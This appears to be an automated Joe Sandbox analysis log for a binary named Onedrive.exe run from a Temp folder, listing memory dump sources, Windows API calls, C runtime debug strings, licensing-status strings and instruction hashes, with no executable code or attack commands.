                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$AllocStringmemmove
                                                    • String ID:
                                                    • API String ID: 62646686-0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Frame$Handler3::is$EmptyExceptFac_nodeFac_node::_Handler3::getStateTypesUnwind__except_validate_context_record_guard_icall_checks_enforcedstd::_
                                                    • String ID: csm$csm
                                                    • API String ID: 1491283442-3733052814
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$("Invalid signal or error", 0)$minkernel\crts\ucrt\src\appcrt\misc\signal.cpp$raise
                                                    • API String ID: 0-1223553036
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_unique_heap_ptrnew[]
                                                    • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$public_stream != nullptr
                                                    • API String ID: 1578314805-3092436121
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_$SchedulerScheduler::___crt_unique_heap_ptr$type_info::_name_internal_method$CriticalLock::_ReentrantScoped_lockScoped_lock::~_
                                                    • String ID: C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                    • API String ID: 930568095-88727064
                                                    • Opcode ID: c197946b17308473d5385c035a85cd2ffa56f7ec18cff5904e093d1f0731d030
                                                    • Instruction ID: 8c2830c28eed0edf74550ad424cc1f8767eef7a717e9b0578a2f633c471192b3
                                                    • Opcode Fuzzy Hash: c197946b17308473d5385c035a85cd2ffa56f7ec18cff5904e093d1f0731d030
                                                    • Instruction Fuzzy Hash: 5061FA7261CA8186E750DB16E4617AAB3A4FB80740F414136E69D9AAEADF3CD544CB40
                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AED142
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AED202
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __vcrt_lock$CriticalEnterSection
                                                    • String ID: %ls$_CrtIsValidHeapPointer(block)$_msize_dbg$block != nullptr$is_block_type_valid(header->_block_use)$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp
                                                    • API String ID: 3216741998-890774455
                                                    • Opcode ID: d2e18c4f5006e9fd8889e5d5fa9a9eef759e1c481ae9fff440f1545f77c3845c
                                                    • Instruction ID: 977688482d034083f2ab27011b56b3b50b41a39d7fa0f0fb45f2fd2edbff6149
                                                    • Opcode Fuzzy Hash: d2e18c4f5006e9fd8889e5d5fa9a9eef759e1c481ae9fff440f1545f77c3845c
                                                    • Instruction Fuzzy Hash: 67418B31B18B4295E760AB22E471B6A77A0FB84354F821536EABD5B7DDDF3CD6808700
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,?,00000000,00007FF63EA1288B), ref: 00007FF63EA1C512
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF63EA1288B), ref: 00007FF63EA1C526
                                                    • GetProcAddress.KERNEL32(?,?,?,?,00000000,00007FF63EA1288B), ref: 00007FF63EA1C559
                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,00000000,00007FF63EA1288B), ref: 00007FF63EA1C56F
                                                    • FreeLibrary.KERNEL32(?,?,?,?,00000000,00007FF63EA1288B), ref: 00007FF63EA1C5AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressErrorFreeHandleLastLoadModuleProc
                                                    • String ID: SLpTriggerServiceWorker$SPPC.DLL$syncreeval
                                                    • API String ID: 590180482-1899451423
                                                    • Opcode ID: 46e5b8ab7ea2b751467af070a34f81cb02269ece383fb26039dd3aadbd22565e
                                                    • Instruction ID: f2f615c426d51c6b458d3818ee1e5de9f6ad5cb5d0a3bbbe7979c9ce5e82557a
                                                    • Opcode Fuzzy Hash: 46e5b8ab7ea2b751467af070a34f81cb02269ece383fb26039dd3aadbd22565e
                                                    • Instruction Fuzzy Hash: 56119625B48B4386FB145B66A41127966D1EFBD791B495034ED0FC7740EE3CE40CA220
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heapwcsstr$FreeProcess$_wtoi
                                                    • String ID:
                                                    • API String ID: 3961436675-0
                                                    • Opcode ID: 565a0733e25fc3e969219e8b484113a938c3ddbc655a07c7785b9cc9b0e56fb7
                                                    • Instruction ID: 000d49abc91ee5e816296cb1eb4325fa74e3b097d593e6175517cf702b0ff480
                                                    • Opcode Fuzzy Hash: 565a0733e25fc3e969219e8b484113a938c3ddbc655a07c7785b9cc9b0e56fb7
                                                    • Instruction Fuzzy Hash: DB71D722B08B9686EB109B66A4041B97AD1FFB8BD5F458134FE4EC7795DE3CE409D320
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D688
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D69C
                                                    • wcschr.MSVCRT(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D6B9
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D7B2
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D7C6
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D7F4
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D808
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D82F
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D843
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$wcschr
                                                    • String ID:
                                                    • API String ID: 3583101917-0
                                                    • Opcode ID: 185475bb1725aeff1ff69b328b1550321ae0c595b163fea367dc587829107306
                                                    • Instruction ID: c542e2721955603cf15aec540940ccb66f27c7e2368642867af04507ae6f79c1
                                                    • Opcode Fuzzy Hash: 185475bb1725aeff1ff69b328b1550321ae0c595b163fea367dc587829107306
                                                    • Instruction Fuzzy Hash: C7616322B08B52C6FF059FA194400BD67A1BFA5B85B498435FE0D97785EF3CE549E320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: LicenseState$SL_LICENSING_STATUS_IN_GRACE_PERIOD$SL_LICENSING_STATUS_LICENSED$SL_LICENSING_STATUS_NOTIFICATION$SL_LICENSING_STATUS_UNLICENSED
                                                    • API String ID: 2081463915-2812009040
                                                    • Opcode ID: cf784307bdb191ea20cf096f8f6de6f8d4d5616a99717e974fa0e9b77618c7be
                                                    • Instruction ID: 9de7591bb5dd44e89431e134c7f447ec00293376e2a2b2d9a03571990ff08964
                                                    • Opcode Fuzzy Hash: cf784307bdb191ea20cf096f8f6de6f8d4d5616a99717e974fa0e9b77618c7be
                                                    • Instruction Fuzzy Hash: B3218260B0C64286E7588B52E58137D6BA2FF75BC0F449035EA0E97B84EF3CE45CA720
                                                    APIs
                                                      • Part of subcall function 00007FFDF3B02010: memcpy_s.LIBCPMTD ref: 00007FFDF3B02061
                                                    • Concurrency::details::BoostedObject::IsScheduleGroupSegment.LIBCMTD ref: 00007FFDF3B01E59
                                                    • Concurrency::details::BoostedObject::IsScheduleGroupSegment.LIBCMTD ref: 00007FFDF3B01FD4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: BoostedConcurrency::details::GroupObject::ScheduleSegment$memcpy_s
                                                    • String ID: %ls$("unexpected input value; log10 failed", 0)$mantissa_buffer_count > 0$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$quotient < digits_per_iteration_multiplier
                                                    • API String ID: 3679209886-1168176157
                                                    • Opcode ID: 4325e9b5c20b1b86593e760ec00f5385cf082cd06ed0e168ca7847738c9bb225
                                                    • Instruction ID: ae33327e66ac0f88d0382cc2d8f6c12d976946c4a0823a241fa1f7f3d2573b8c
                                                    • Opcode Fuzzy Hash: 4325e9b5c20b1b86593e760ec00f5385cf082cd06ed0e168ca7847738c9bb225
                                                    • Instruction Fuzzy Hash: 27023A76B1C6818AE760DB14E460BAAB7A1FB84340F954136E6ED9ABDDDF3CD444CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: allocator
                                                    • String ID: %ls$("Buffer too small", 0)$buffer != nullptr && buffer_count > 0$common_vsnprintf_s$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                                    • API String ID: 3447690668-215146566
                                                    • Opcode ID: 8d57fec41b4c742aac83ea82b647f2bd7548b34a8331297ae6f6faa5e1863818
                                                    • Instruction ID: 1c23dcc381837f3df011efee9e44ae15151e6c62dd9fcef07096f6ca0fee4059
                                                    • Opcode Fuzzy Hash: 8d57fec41b4c742aac83ea82b647f2bd7548b34a8331297ae6f6faa5e1863818
                                                    • Instruction Fuzzy Hash: 95023D3260CA8685E7709B16E464BBAB3A0FB84750F510235E6ED5BAEDDF3CD4858B40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: allocator
                                                    • String ID: %ls$("Buffer too small", 0)$buffer != nullptr && buffer_count > 0$common_vsnprintf_s$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                                    • API String ID: 3447690668-215146566
                                                    • Opcode ID: 9ccc0799407a035980ca35a257dbbe8603f8fb4214fbec40f9633d6e023181ab
                                                    • Instruction ID: c238a8a11463e4c2467166a3e11db6d4a24d346b6dd07d7b86ff55dc244f7199
                                                    • Opcode Fuzzy Hash: 9ccc0799407a035980ca35a257dbbe8603f8fb4214fbec40f9633d6e023181ab
                                                    • Instruction Fuzzy Hash: D6023F3260CA8285E7B0DB16E464BAAB3A0FB84754F510235E6ED5BBDDDF3CD4858B40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$DirectEventFreeIndex@ProcessSelect@SelectionTouchTransferWrite
                                                    • String ID: ChooseRegion$Loading$Number$TollNumber
                                                    • API String ID: 4007878856-2571249176
                                                    • Opcode ID: 0279151202938e21ffb4fb5d64393771a02b836f32215ccfbddf941e754a0aa0
                                                    • Instruction ID: b437324c4d6da15c83a14c6945d9bbb6436d9953702a95d6e4aced688ca0d877
                                                    • Opcode Fuzzy Hash: 0279151202938e21ffb4fb5d64393771a02b836f32215ccfbddf941e754a0aa0
                                                    • Instruction Fuzzy Hash: EA713B21B09A4796FB009FA2E8502B827A5BFB4784F425531EA0ED7795DE3CF41DE320
                                                    APIs
                                                    • ?Create@DUIXmlParser@DirectUI@@SAJPEAPEAV12@P6APEAVValue@2@PEBGPEAX@Z2P6AX11H2@Z2@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF63EA19036
                                                    • ?SetXMLFromResource@DUIXmlParser@DirectUI@@QEAAJIPEAUHINSTANCE__@@0@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF63EA19060
                                                    • ?CreateElement@DUIXmlParser@DirectUI@@QEAAJPEBGPEAVElement@2@1PEAKPEAPEAV32@@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF63EA19099
                                                      • Part of subcall function 00007FF63EA166D4: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FF63EA1675E
                                                      • Part of subcall function 00007FF63EA16610: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FF63EA166AF
                                                    • GetScaleFactor.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF63EA1910A
                                                    • ?Destroy@DUIXmlParser@DirectUI@@QEAAXXZ.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF63EA191A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DirectParser@$FreeTask$CreateCreate@Destroy@E__@@0@Element@Element@2@1FactorFromResource@ScaleV12@V32@@Value@2@
                                                    • String ID: Compliance$ComplianceText
                                                    • API String ID: 570248755-1314619677
                                                    • Opcode ID: 8b78037bbcabbcbb6045ab8e19150145eef68e87cc9f8055a6f0a411eb7a8557
                                                    • Instruction ID: 72353fb7eef004e3c3f5aecdb5054f80e0f4d024ac04a34ae73856c18421c0d4
                                                    • Opcode Fuzzy Hash: 8b78037bbcabbcbb6045ab8e19150145eef68e87cc9f8055a6f0a411eb7a8557
                                                    • Instruction Fuzzy Hash: 36712E36B08B4686FB119BA6E4403A937A1FBA8788F408435EE4E97755DF3CE44CD750
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID: ErrorCID
                                                    • API String ID: 3859560861-3250631935
                                                    • Opcode ID: 87562fb0df644233fc4ef7c3f415d9b073dabda7fb8b5e47c8d9690f725e6cbc
                                                    • Instruction ID: f3a3d1b753d917c94b255143dcb4e39dd448c1589e61e4f38e89ab9b01985699
                                                    • Opcode Fuzzy Hash: 87562fb0df644233fc4ef7c3f415d9b073dabda7fb8b5e47c8d9690f725e6cbc
                                                    • Instruction Fuzzy Hash: 0E512831F08A56C6FB009BA2D4502BD67A1BFB8784F554435EA0DE7795DF3CE409A320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: swprintf
                                                    • String ID: $ Data: <%s> %s$%.2X $(*_errno())$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$print_block_data
                                                    • API String ID: 233258989-578187083
                                                    • Opcode ID: dc6febcad760b90265b93becb28017f616756b66ea6b9f90a2c4d3c71971683e
                                                    • Instruction ID: d1a6ed95b6ec190c088bdc45fabdb4d21a4e399b5a745785c2977d1dc5296687
                                                    • Opcode Fuzzy Hash: dc6febcad760b90265b93becb28017f616756b66ea6b9f90a2c4d3c71971683e
                                                    • Instruction Fuzzy Hash: 62518D3260CB8585E7209B16E0A47AAB7A0FBC5780F514136EADD5BBDEDF3CD0848B00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr
                                                    • String ID: W$g$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
                                                    • API String ID: 4142048518-2829134390
                                                    • Opcode ID: 5bbead02dfe7c340e301f50630c07c7c7bbcd2b1db9117826fc8bec54c57956b
                                                    • Instruction ID: e8ca4b864951ecbf490f4aedea9d6eb71baf5aeb519a505e8a8a07ff6df32e33
                                                    • Opcode Fuzzy Hash: 5bbead02dfe7c340e301f50630c07c7c7bbcd2b1db9117826fc8bec54c57956b
                                                    • Instruction Fuzzy Hash: 9951FC36618B85C2DB10DB1AE46066AB3A4F7C4B84F614235EB9E4B7E9DF3DD445CB00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$local_action != nullptr$minkernel\crts\ucrt\src\appcrt\misc\signal.cpp$raise
                                                    • API String ID: 0-2615017910
